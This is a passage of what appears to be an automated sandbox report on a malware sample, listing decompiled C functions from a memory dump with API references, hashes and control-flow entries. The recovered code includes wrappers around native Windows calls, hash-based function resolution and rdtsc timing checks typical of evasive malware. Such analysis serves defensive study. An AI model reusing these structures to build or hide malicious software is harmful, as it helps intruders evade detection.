                					__eflags = _t18;
                					if(_t18 == 0) {
                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                						return _v16;
                					}
                					return _t18;
                				} else {
                					return _t15;
                				}
                			}













                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 234 41a32a-41a381 call 41af30 NtCreateFile
                C-Code - Quality: 64%
                			E0041A32A(void* __eax, void* __ebx, void* __ecx) {
                				long _t20;
                				void* _t33;
                				void* _t37;
                
                				_t14 = __eax;
                				_push(__eax);
                				asm("cmpsd");
                				_t2 = _t14 + 0xc40; // 0xc40
                				E0041AF30(_t33, __eax, _t2,  *((intOrPtr*)(__eax + 0x10)), 0, 0x28);
                				_t20 = NtCreateFile( *(_t37 + 0xc),  *(_t37 + 0x10),  *(_t37 + 0x14),  *(_t37 + 0x18),  *(_t37 + 0x1c),  *(_t37 + 0x20),  *(_t37 + 0x24),  *(_t37 + 0x28),  *(_t37 + 0x2c),  *(_t37 + 0x30),  *(_t37 + 0x34)); // executed
                				return _t20;
                			}






                APIs
                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: e2ba16ba97907cb79b36fad112c88b6bc11b3647f296aafa029722d4b6a74a8f
                • Instruction ID: 8c1b4d357b314ee3ffb4b8eb0307ab4e303c37b1b4fdb4d305810e8d8fab50f6
                • Opcode Fuzzy Hash: e2ba16ba97907cb79b36fad112c88b6bc11b3647f296aafa029722d4b6a74a8f
                • Instruction Fuzzy Hash: 72F0C4B2215108AFCB48CF98DD95EEB33ADAF8C314F15824DBA1D97241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 238 41a330-41a381 call 41af30 NtCreateFile
                C-Code - Quality: 100%
                			E0041A330(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                				intOrPtr _t15;
                				long _t21;
                				void* _t31;
                
                				_t15 = _a4;
                				_t3 = _t15 + 0xc40; // 0xc40
                				E0041AF30(_t31, _t15, _t3,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x28);
                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                				return _t21;
                			}






                APIs
                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 242 41a510-41a54d call 41af30 NtAllocateVirtualMemory
                C-Code - Quality: 100%
                			E0041A510(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                				long _t14;
                				void* _t21;
                
                				_t3 = _a4 + 0xc60; // 0xca0
                				E0041AF30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                				return _t14;
                			}





                APIs
                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 251 41a45a-41a489 call 41af30 NtClose
                C-Code - Quality: 100%
                			E0041A45A(void* __eax, void* __ecx, intOrPtr _a4, void* _a8) {
                				long _t11;
                				void* _t15;
                
                				_t8 = _a4;
                				_t2 = _t8 + 0x10; // 0x300
                				_t3 = _t8 + 0xc50; // 0x40a943
                				E0041AF30(_t15, _a4, _t3,  *_t2, 0, 0x2c);
                				_t11 = NtClose(_a8); // executed
                				return _t11;
                			}





                APIs
                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: a8e2578809e0d6b9c1d50abec3a9bdcc37ae46ee257f9af49f07144bd31fd702
                • Instruction ID: cdf3d8b757d3f569b9bd798600e91733a273244a01ffce3be97f2d6bb6650bbf
                • Opcode Fuzzy Hash: a8e2578809e0d6b9c1d50abec3a9bdcc37ae46ee257f9af49f07144bd31fd702
                • Instruction Fuzzy Hash: 67E08CB2210210ABDB20EBE48C45EE77BA8EF45764F144499BA889B242C130E60187D0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 254 41a460-41a476 255 41a47c-41a489 NtClose 254->255 256 41a477 call 41af30 254->256 256->255
                C-Code - Quality: 100%
                			E0041A460(intOrPtr _a4, void* _a8) {
                				long _t8;
                				void* _t11;
                
                				_t5 = _a4;
                				_t2 = _t5 + 0x10; // 0x300
                				_t3 = _t5 + 0xc50; // 0x40a943
                				E0041AF30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                				_t8 = NtClose(_a8); // executed
                				return _t8;
                			}





                APIs
                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00409AB0(intOrPtr* _a4) {
                				intOrPtr _v8;
                				char _v24;
                				char _v284;
                				char _v804;
                				char _v840;
                				void* _t24;
                				void* _t31;
                				void* _t33;
                				void* _t34;
                				void* _t39;
                				void* _t50;
                				intOrPtr* _t52;
                				void* _t53;
                				void* _t54;
                				void* _t55;
                				void* _t56;
                
                				_t52 = _a4;
                				_t39 = 0; // executed
                				_t24 = E00407EA0(_t52,  &_v24); // executed
                				_t54 = _t53 + 8;
                				if(_t24 != 0) {
                					E004080B0( &_v24,  &_v840);
                					_t55 = _t54 + 8;
                					do {
                						E0041BDE0( &_v284, 0x104);
                						E0041C450( &_v284,  &_v804);
                						_t56 = _t55 + 0x10;
                						_t50 = 0x4f;
                						while(1) {
                							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                							_t56 = _t56 + 0x10;
                							if(_t31 != 0) {
                								break;
                							}
                							_t50 = _t50 + 1;
                							if(_t50 <= 0x62) {
                								continue;
                							} else {
                							}
                							goto L8;
                						}
                						_t9 = _t52 + 0x14; // 0xffffe045
                						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                						_t39 = 1;
                						L8:
                						_t33 = E004080E0( &_v24,  &_v840);
                						_t55 = _t56 + 8;
                					} while (_t33 != 0 && _t39 == 0);
                					_t34 = E00408160(_t52,  &_v24); // executed
                					if(_t39 == 0) {
                						asm("rdtsc");
                						asm("rdtsc");
                						_v8 = _t34 - 0 + _t34;
                						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                					}
                					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                					_t20 = _t52 + 0x31; // 0x5608758b
                					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                					return 1;
                				} else {
                					return _t24;
                				}
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 6 41a600-41a631 call 41af30 RtlAllocateHeap
                C-Code - Quality: 100%
                			E0041A600(intOrPtr _a4, char _a8, long _a12, long _a16) {
                				void* _t10;
                				void* _t15;
                
                				E0041AF30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                				_t6 =  &_a8; // 0x414536
                				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                				return _t10;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: 6EA
                • API String ID: 1279760036-1400015478
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 204 408310-40835a call 41be30 call 41c9d0 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                C-Code - Quality: 82%
                			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                				char _v67;
                				char _v68;
                				void* _t12;
                				intOrPtr* _t13;
                				int _t14;
                				long _t21;
                				intOrPtr* _t25;
                				void* _t26;
                				void* _t30;
                
                				_t30 = __eflags;
                				_v68 = 0;
                				E0041BE30( &_v67, 0, 0x3f);
                				E0041C9D0( &_v68, 3);
                				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                				_t25 = _t13;
                				if(_t25 != 0) {
                					_t21 = _a8;
                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                					_t32 = _t14;
                					if(_t14 == 0) {
                						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                					}
                					return _t14;
                				}
                				return _t13;
                			}

                APIs
                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 245 41a640-41a671 call 41af30 RtlFreeHeap
                C-Code - Quality: 100%
                			E0041A640(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                				char _t10;
                				void* _t15;
                
                				_t3 = _a4 + 0xc74; // 0xc74
                				E0041AF30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                				return _t10;
                			}

                APIs
                • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 248 41a7a0-41a7d4 call 41af30 LookupPrivilegeValueW
                C-Code - Quality: 100%
                			E0041A7A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                				int _t10;
                				void* _t15;
                
                				E0041AF30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                				return _t10;
                			}

                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 257 41a680-41a6a8 call 41af30 ExitProcess
                C-Code - Quality: 100%
                			E0041A680(intOrPtr _a4, int _a8) {
                				int _t9;
                				void* _t10;
                
                				_t5 = _a4;
                				E0041AF30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                				_t9 = _a8;
                				ExitProcess(_t9);
                			}

                APIs
                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E0041A632(void* __eax, void* __ecx, void* __edi, void* _a4, long _a8, void* _a12) {
                				intOrPtr _v0;
                				char _t15;
                				int _t20;
                
                				_push(cs);
                				_t3 = __edi - 0x4f25f049;
                				 *_t3 =  *((intOrPtr*)(__edi - 0x4f25f049)) - __eax;
                				if( *_t3 != 0) {
                					ExitProcess(_t20);
                				}
                				asm("cmc");
                				_t12 = _v0;
                				_t7 = _t12 + 0xc74; // 0xc74
                				E0041AF30(__edi, _v0, _t7,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                				_t15 = RtlFreeHeap(_a4, _a8, _a12); // executed
                				return _t15;
                			}

                APIs
                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00EA4194(intOrPtr* __eax, void* __edx, void* __edi, signed int __esi) {
                				void* __ebx;
                				signed int _t268;
                				void* _t269;
                				signed int _t275;
                				signed int _t276;
                				signed int _t277;
                				signed int _t278;
                				signed int _t279;
                				signed int _t280;
                				signed int _t281;
                				signed int _t282;
                				signed int _t283;
                				signed int _t284;
                				signed int _t285;
                				signed int _t286;
                				signed int _t287;
                				signed int _t288;
                				signed int _t289;
                				signed int _t290;
                				signed int _t291;
                				signed int _t292;
                				signed int _t293;
                				signed int _t294;
                				signed int _t295;
                				signed int _t296;
                				signed int _t297;
                				signed int _t298;
                				signed int _t299;
                				signed int _t300;
                				signed int _t301;
                				signed int _t302;
                				signed int _t303;
                				signed int _t304;
                				signed int _t305;
                				signed int _t306;
                				signed int _t307;
                				signed int _t308;
                				signed int _t309;
                				signed int _t310;
                				signed int _t311;
                				signed int _t312;
                				signed int _t313;
                				signed int _t314;
                				signed int _t315;
                				signed int _t316;
                				signed int _t317;
                				signed int _t318;
                				signed int _t319;
                				signed int _t320;
                				signed int _t321;
                				signed int _t322;
                				signed int _t323;
                				signed int _t324;
                				signed int _t325;
                				signed int _t326;
                				void* _t328;
                
                				 *__eax =  *__eax + __eax;
                				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
                				_push(_t269);
                				_push(1);
                				_push(_t328 - 8);
                				_t275 = __esi | E00EB4CB1(_t269, __edi, __esi);
                				_t276 = _t275 | E00EB4CB1(_t269, __edi, _t275, _t328 - 8, 1, _t269, 0x41, __edi + 0x8c);
                				_t277 = _t276 | E00EB4CB1(_t269, __edi, _t276, _t328 - 8, 1, _t269, 0x42, __edi + 0x90);
                				_t278 = _t277 | E00EB4CB1(_t269, __edi, _t277, _t328 - 8, 1, _t269, 0x43, __edi + 0x94);
                				_t279 = _t278 | E00EB4CB1(_t269, __edi, _t278, _t328 - 8, 1, _t269, 0x28, __edi + 0x98);
                				_t280 = _t279 | E00EB4CB1(_t269, __edi, _t279, _t328 - 8, 1, _t269, 0x29, __edi + 0x9c);
                				_t281 = _t280 | E00EB4CB1(_t269, __edi, _t280, _t328 - 8, 1, _t269, 0x1f, __edi + 0xa0);
                				_t282 = _t281 | E00EB4CB1(_t269, __edi, _t281, _t328 - 8, 1, _t269, 0x20, __edi + 0xa4);
                				_t283 = _t282 | E00EB4CB1(_t269, __edi, _t282, _t328 - 8, 1, _t269, 0x1003, __edi + 0xa8);
                				_t284 = _t283 | E00EB4CB1(_t269, __edi, _t283, _t328 - 8, 0, _t269, 0x1009, __edi + 0xac);
                				_t285 = _t284 | E00EB4CB1(_t269, __edi, _t284, _t328 - 8, 2, _t269, 0x31, __edi + 0xb8);
                				_t286 = _t285 | E00EB4CB1(_t269, __edi, _t285, _t328 - 8, 2, _t269, 0x32, __edi + 0xbc);
                				_t287 = _t286 | E00EB4CB1(_t269, __edi, _t286, _t328 - 8, 2, _t269, 0x33, __edi + 0xc0);
                				_t288 = _t287 | E00EB4CB1(_t269, __edi, _t287, _t328 - 8, 2, _t269, 0x34, __edi + 0xc4);
                				_t289 = _t288 | E00EB4CB1(_t269, __edi, _t288, _t328 - 8, 2, _t269, 0x35, __edi + 0xc8);
                				_t290 = _t289 | E00EB4CB1(_t269, __edi, _t289, _t328 - 8, 2, _t269, 0x36, __edi + 0xcc);
                				_t291 = _t290 | E00EB4CB1(_t269, __edi, _t290, _t328 - 8, 2, _t269, 0x37, __edi + 0xb4);
                				_t292 = _t291 | E00EB4CB1(_t269, __edi, _t291, _t328 - 8, 2, _t269, 0x2a, __edi + 0xd4);
                				_t293 = _t292 | E00EB4CB1(_t269, __edi, _t292, _t328 - 8, 2, _t269, 0x2b, __edi + 0xd8);
                				_t294 = _t293 | E00EB4CB1(_t269, __edi, _t293, _t328 - 8, 2, _t269, 0x2c, __edi + 0xdc);
                				_t295 = _t294 | E00EB4CB1(_t269, __edi, _t294, _t328 - 8, 2, _t269, 0x2d, __edi + 0xe0);
                				_t296 = _t295 | E00EB4CB1(_t269, __edi, _t295, _t328 - 8, 2, _t269, 0x2e, __edi + 0xe4);
                				_t297 = _t296 | E00EB4CB1(_t269, __edi, _t296, _t328 - 8, 2, _t269, 0x2f, __edi + 0xe8);
                				_t298 = _t297 | E00EB4CB1(_t269, __edi, _t297, _t328 - 8, 2, _t269, 0x30, __edi + 0xd0);
                				_t299 = _t298 | E00EB4CB1(_t269, __edi, _t298, _t328 - 8, 2, _t269, 0x44, __edi + 0xec);
                				_t300 = _t299 | E00EB4CB1(_t269, __edi, _t299, _t328 - 8, 2, _t269, 0x45, __edi + 0xf0);
                				_t301 = _t300 | E00EB4CB1(_t269, __edi, _t300, _t328 - 8, 2, _t269, 0x46, __edi + 0xf4);
                				_t302 = _t301 | E00EB4CB1(_t269, __edi, _t301, _t328 - 8, 2, _t269, 0x47, __edi + 0xf8);
                				_t303 = _t302 | E00EB4CB1(_t269, __edi, _t302, _t328 - 8, 2, _t269, 0x48, __edi + 0xfc);
                				_t304 = _t303 | E00EB4CB1(_t269, __edi, _t303, _t328 - 8, 2, _t269, 0x49, __edi + 0x100);
                				_t305 = _t304 | E00EB4CB1(_t269, __edi, _t304, _t328 - 8, 2, _t269, 0x4a, __edi + 0x104);
                				_t306 = _t305 | E00EB4CB1(_t269, __edi, _t305, _t328 - 8, 2, _t269, 0x4b, __edi + 0x108);
                				_t307 = _t306 | E00EB4CB1(_t269, __edi, _t306, _t328 - 8, 2, _t269, 0x4c, __edi + 0x10c);
                				_t308 = _t307 | E00EB4CB1(_t269, __edi, _t307, _t328 - 8, 2, _t269, 0x4d, __edi + 0x110);
                				_t309 = _t308 | E00EB4CB1(_t269, __edi, _t308, _t328 - 8, 2, _t269, 0x4e, __edi + 0x114);
                				_t310 = _t309 | E00EB4CB1(_t269, __edi, _t309, _t328 - 8, 2, _t269, 0x4f, __edi + 0x118);
                				_t311 = _t310 | E00EB4CB1(_t269, __edi, _t310, _t328 - 8, 2, _t269, 0x38, __edi + 0x11c);
                				_t312 = _t311 | E00EB4CB1(_t269, __edi, _t311, _t328 - 8, 2, _t269, 0x39, __edi + 0x120);
                				_t313 = _t312 | E00EB4CB1(_t269, __edi, _t312, _t328 - 8, 2, _t269, 0x3a, __edi + 0x124);
                				_t314 = _t313 | E00EB4CB1(_t269, __edi, _t313, _t328 - 8, 2, _t269, 0x3b, __edi + 0x128);
                				_t315 = _t314 | E00EB4CB1(_t269, __edi, _t314, _t328 - 8, 2, _t269, 0x3c, __edi + 0x12c);
                				_t316 = _t315 | E00EB4CB1(_t269, __edi, _t315, _t328 - 8, 2, _t269, 0x3d, __edi + 0x130);
                				_t317 = _t316 | E00EB4CB1(_t269, __edi, _t316, _t328 - 8, 2, _t269, 0x3e, __edi + 0x134);
                				_t318 = _t317 | E00EB4CB1(_t269, __edi, _t317, _t328 - 8, 2, _t269, 0x3f, __edi + 0x138);
                				_t319 = _t318 | E00EB4CB1(_t269, __edi, _t318, _t328 - 8, 2, _t269, 0x40, __edi + 0x13c);
                				_t320 = _t319 | E00EB4CB1(_t269, __edi, _t319, _t328 - 8, 2, _t269, 0x41, __edi + 0x140);
                				_t321 = _t320 | E00EB4CB1(_t269, __edi, _t320, _t328 - 8, 2, _t269, 0x42, __edi + 0x144);
                				_t322 = _t321 | E00EB4CB1(_t269, __edi, _t321, _t328 - 8, 2, _t269, 0x43, __edi + 0x148);
                				_t323 = _t322 | E00EB4CB1(_t269, __edi, _t322, _t328 - 8, 2, _t269, 0x28, __edi + 0x14c);
                				_t324 = _t323 | E00EB4CB1(_t269, __edi, _t323, _t328 - 8, 2, _t269, 0x29, __edi + 0x150);
                				_t325 = _t324 | E00EB4CB1(_t269, __edi, _t324, _t328 - 8, 2, _t269, 0x1f, __edi + 0x154);
                				_t326 = _t325 | E00EB4CB1(_t269, __edi, _t325, _t328 - 8, 2, _t269, 0x20, __edi + 0x158);
                				_t268 = E00EB4CB1(_t269, __edi, _t326, _t328 - 8, 2, _t269, 0x1003, __edi + 0x15c) | _t326;
                				return _t268;
                			}

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB92A9
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB92C3
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB92DA
                • ___getlocaleinfo.LIBCMT ref: 00EB92F1
                • ___getlocaleinfo.LIBCMT ref: 00EB9308
                • ___getlocaleinfo.LIBCMT ref: 00EB9322
                • ___getlocaleinfo.LIBCMT ref: 00EB9339
                • ___getlocaleinfo.LIBCMT ref: 00EB9350
                • ___getlocaleinfo.LIBCMT ref: 00EB936A
                • ___getlocaleinfo.LIBCMT ref: 00EB9387
                • ___getlocaleinfo.LIBCMT ref: 00EB939E
                • ___getlocaleinfo.LIBCMT ref: 00EB93B5
                • ___getlocaleinfo.LIBCMT ref: 00EB93CC
                • ___getlocaleinfo.LIBCMT ref: 00EB93E6
                • ___getlocaleinfo.LIBCMT ref: 00EB93FD
                • ___getlocaleinfo.LIBCMT ref: 00EB9414
                • ___getlocaleinfo.LIBCMT ref: 00EB942B
                • ___getlocaleinfo.LIBCMT ref: 00EB9445
                • ___getlocaleinfo.LIBCMT ref: 00EB945C
                • ___getlocaleinfo.LIBCMT ref: 00EB9473
                • ___getlocaleinfo.LIBCMT ref: 00EB948A
                • ___getlocaleinfo.LIBCMT ref: 00EB94A4
                • ___getlocaleinfo.LIBCMT ref: 00EB94BB
                • ___getlocaleinfo.LIBCMT ref: 00EB94D2
                • ___getlocaleinfo.LIBCMT ref: 00EB94E9
                • ___getlocaleinfo.LIBCMT ref: 00EB9503
                • ___getlocaleinfo.LIBCMT ref: 00EB951A
                • ___getlocaleinfo.LIBCMT ref: 00EB9531
                • ___getlocaleinfo.LIBCMT ref: 00EB9548
                • ___getlocaleinfo.LIBCMT ref: 00EB9562
                • ___getlocaleinfo.LIBCMT ref: 00EB9579
                • ___getlocaleinfo.LIBCMT ref: 00EB9590
                • ___getlocaleinfo.LIBCMT ref: 00EB95A7
                • ___getlocaleinfo.LIBCMT ref: 00EB95C1
                • ___getlocaleinfo.LIBCMT ref: 00EB95D8
                • ___getlocaleinfo.LIBCMT ref: 00EB95EF
